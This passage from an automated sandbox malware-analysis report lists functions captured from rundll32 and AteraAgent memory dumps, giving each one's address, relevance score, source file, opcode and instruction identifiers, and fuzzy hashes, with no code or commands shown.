                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5feb2fd10dc9122ead130a0a39c652f4535b9faafaef7fb6b30ca4f661361bd1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d37f33400b1ad1b124561e49716953f7d20f2094e90578a5a7212433891ccb36
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DE04F7150A2868FCB01CB70A91559ABFF5DF4621472046EBD454DB265DA351E048780
                                                                                                                                                                                                                                                                                                                                    Function 072F0C48 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: cfe0fbca28c1ff0470abb2762bac0b33230b7f16d83ff5a2b24d203ff1799356
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 60452e5f00b31902723ade4623f62b3c04d5535bc916dcfed2a76f266a99055b
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfe0fbca28c1ff0470abb2762bac0b33230b7f16d83ff5a2b24d203ff1799356
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5D0A7713701205BC600539DE454969779DDB4A710F00046AF20ACB335C991EC404288
                                                                                                                                                                                                                                                                                                                                    Function 072F0C0C Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 45b8ac1269e4317f642b80e6744e54fa6416255669fe77ad4eff962b60f5a3fe
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 10d9bb0a714dd3f8cdd24a4a4083a6f91b626d12732ea21dd7b7cc903068b8d9
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45b8ac1269e4317f642b80e6744e54fa6416255669fe77ad4eff962b60f5a3fe
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FD0A77233011CAB46146759D85586AFB99E7957E17904433FB0283224CD616C6083D6
                                                                                                                                                                                                                                                                                                                                    Function 072F2968 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 123156ea19346f3f62ff6a028401ea5eaaf15dd89e2d17c2453695cf4b68c707
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4baef4922d021ade023ed479d881d8dd954e5efcc190f99915f8c7a97ccab0e1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 123156ea19346f3f62ff6a028401ea5eaaf15dd89e2d17c2453695cf4b68c707
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9D05E7490120ADFCF00DFB5EA0595EBFFAEB44244B2086A5D804D3224EB316F108B80
                                                                                                                                                                                                                                                                                                                                    Function 072F0440 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: bd15dd1da4d602770b522560f731aa53569c59ebd8ea4aae55e8c6aa2a8ef5b5
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 64e97b6f921bef24e93dcc8120386f2eeb343af6da7b1c5e5c74ff0303c7886d
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd15dd1da4d602770b522560f731aa53569c59ebd8ea4aae55e8c6aa2a8ef5b5
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFC0123610E3A04FC7038B20A8464E1BF31AB6232230947DBE0C189462C62A0A99C7B2

                                                                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B600C1D Relevance: 1.2, Instructions: 1196COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: b4d63272f545005d9a99f7f2739e91e6829cba10b16e761533a633e428918672
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7408a678332afdbcfb457bd831349ccb8273f9e0c7286c0d9e95c391756270d8
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4d63272f545005d9a99f7f2739e91e6829cba10b16e761533a633e428918672
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30A22B70A0961D8FDBA9DF19C8A4BA9B7B1FF5A304F1040FDD05ED7295CA35AA81CB10
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B60187E Relevance: .7, Instructions: 652COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 36ee6af6fd564ecd03f40eed0543e5491841fba6dc0feb75452718dd41cedc70
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7dfc3b2662e9ab46cc9a63e5bf06970bf89cf4ae81d5bd1032da09915cff4364
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36ee6af6fd564ecd03f40eed0543e5491841fba6dc0feb75452718dd41cedc70
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8324D30A0962D8FEBA5DF69C4947A9B7B1EF56300F1140E9D05DEB291CB75AE85CF00
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B60C922 Relevance: .5, Instructions: 461COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2975e09bd95a6045a7df39073e09ab92030f8b64489e5d7e2015a87f6cbf052e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5b50aa4ee2ebad65e9823a75374943bbcb397125efa5111e64ca56f75deac45e
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2975e09bd95a6045a7df39073e09ab92030f8b64489e5d7e2015a87f6cbf052e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FE11630A09A8D8FEBA8DF29C8657E977E1FF55310F04426EE85DC7295CF34A9418B81
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B601E7E Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1fc990d210a5a236cbc6f0ea2e2847b53d62641b55810b32c77e28fdda619dd6
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: aae0555df986b88148bea3c273c3f9b1a0c9861aaacfc6f8c7752bcb7ad91713
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fc990d210a5a236cbc6f0ea2e2847b53d62641b55810b32c77e28fdda619dd6
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC514D30A0962D8FEBB5DB65C8947A9B3B1EF5A300F1140E5D05CD72A2CE74AE81CB00
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B601E88 Relevance: .1, Instructions: 132COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: df38514dcfada0684892850ceb3b2bfe3c9eba71192da40288088b4150eade31
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3ef7faada53a44caa3a7bde313daa6072485c3bed5b544b6fbee60cf9dde3930
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df38514dcfada0684892850ceb3b2bfe3c9eba71192da40288088b4150eade31
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E417C30A0962D8FEBB5DB65C8947A9B3B1EF56300F1140F9D05CDB2A2DE75AE85CB40
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B601EB6 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1d16575315d8ac007eab076e7aeb455a256aa7721263e82237f03b5c7baf6819
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4bdf17658f072b0e3a1064919fd0a3d8a098f345fda4b5b86cb99a411a2f8942
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d16575315d8ac007eab076e7aeb455a256aa7721263e82237f03b5c7baf6819
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1412870A0962D8FEBA5DF69C8947E9B3B0EF5A300F1140E5D05CD7292CA74AE81CF00
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B606058 Relevance: 4.3, Strings: 3, Instructions: 575COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: N_I$N_^$N_^
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3680607079
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6b5d22b18cc440dfe90923a4729969234d5ec0b8af47506421305bb7193d9428
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: f30238fb160cf7e3c592ffbd111a8d488a08dda10b43a1d80a984eb8ed06bdd2
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b5d22b18cc440dfe90923a4729969234d5ec0b8af47506421305bb7193d9428
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84F15E13B0E69A0BE325AAAEF8615E93B50EF8137170541B7D2ECCE0E7DD14790A83D1
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6057E8 Relevance: 3.0, Strings: 2, Instructions: 471COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: N_^$N_^
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-324526423
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: a70dcc04be9356ccbfca98ec60d9e67fea4587562126b5c26a8972338eee7cf0
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 015f5a71941c7c5989de4d29f3f088c904edb53ae9fd0feda86438c442931554
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a70dcc04be9356ccbfca98ec60d9e67fea4587562126b5c26a8972338eee7cf0
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBE11026B0E7950FD325BBBD98A15E87B90DF42365B0801FBD1D9CF0E3E918654A8391
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B605730 Relevance: 2.8, Strings: 2, Instructions: 328COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: c$N_^
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-768855989
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0985becf0a35eb78dc3a538865d385885e6060e2b815b2564bdac21a1465c77b
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1fc58705764b8e10a24dac60c51e0a47b055917de6ebc1897214118a8ebc6988
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0985becf0a35eb78dc3a538865d385885e6060e2b815b2564bdac21a1465c77b
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F919717B0E6E607E32576ADA8B15E97B50DF42276B0801F7D2DDCE093D908644F8295
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B607627 Relevance: 1.7, Strings: 1, Instructions: 481COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: E
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3568589458
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0c2a7747d35cb044eb52d03c79a50e83bd632e5b0fef189b1436d4253375bd93
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 655d6933821762fdfc297f6226e315255045bebd88d5820b4fd852be2be5efae
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c2a7747d35cb044eb52d03c79a50e83bd632e5b0fef189b1436d4253375bd93
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA812522A0EA9D4FF795EB6DD8646E87BA0EF4A311F1401BAC458CF1E7DE242C46C351
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6F0850 Relevance: .9, Instructions: 945COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794494612.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b6f0000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5637de8abb0a572b76e25cbde12dd356329e431106cb2eedd36d8d39b3a8cac5
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 41fea8bf88f93b1267d67aa6c206d88f05c2636d194ebc4cc5ef465927aef0b6
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5637de8abb0a572b76e25cbde12dd356329e431106cb2eedd36d8d39b3a8cac5
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57F12830B0DA494FE7A99B2C88656743BD2EF5A710B0501FED09ECB2E7DD25BC428781
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B600C89 Relevance: .9, Instructions: 919COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 77b26c5586d6ac495a027cec82f96a24a9413ea7f6b1e85859ed26edee84b18a
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: ffb265ec0dd907fa4f7da3ce00a619e0c8f2aa69d6d72374fa6ef08bb29c4f5e
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77b26c5586d6ac495a027cec82f96a24a9413ea7f6b1e85859ed26edee84b18a
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37822A70A0561D8FDBA9EF15C8A4BA9B7B1FF5A304F5040FDD01ED72A5CA35AA81CB10
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B608265 Relevance: .5, Instructions: 471COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ace9132b70ff25e00ba263263d4c69e7ffacd84f461a992961135781f26e632b
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 480529fbda7dde248fdc0e5b3d104ce55ba4ac27424166c0c257559ce18202a5
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ace9132b70ff25e00ba263263d4c69e7ffacd84f461a992961135781f26e632b
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E020C70A09A5D8FDBA8DB69C494BE8B7F1FF59301F1540AAD05DE72A1DB34A981CF00
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B60B679 Relevance: .4, Instructions: 415COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: dea3f976f35e61554f65660261d7af9b20f98e880e7fcc88b4fc871ded2a2860
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: dd772df277ab2fd514a1bdd198191784dbd1963b89e5d4bb60b2963247e924e6
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dea3f976f35e61554f65660261d7af9b20f98e880e7fcc88b4fc871ded2a2860
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FD1E930A0CA8D8FEBA8DF29C8557E977D1FF55310F04826EE85DC7295CB74A9418B82
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B60673C Relevance: .4, Instructions: 359COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5ab010f5cf39d59441cb6e44ae3d9e3cf3ac30cf4e50ce6e6390dd5a8916a051
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8bf604d943a144ed38fc79c92ab0fdbd8b7cebdf6b7a260a506e8f87ee90ed35
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ab010f5cf39d59441cb6e44ae3d9e3cf3ac30cf4e50ce6e6390dd5a8916a051
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBC15D71A0E6CE4FE765DB6A88656A53FE0EF16310F0500FDD0A9CF1E7E918B9098390
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B602FFA Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 70a38c5f020f4ba14388b08d0c51046f96629d356b73e01e573d58108af5b1b3
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 85debfe46dc01be5d79cf4e92aa62c9668f39e5c7cbc59aeb8e4805ba91ff627
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70a38c5f020f4ba14388b08d0c51046f96629d356b73e01e573d58108af5b1b3
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75A1FB26B0D3A64BD709B76DF4B19E93B50DF82236B0841B7D2DD9D0D7CE18648F8294
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6F0001 Relevance: .3, Instructions: 341COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
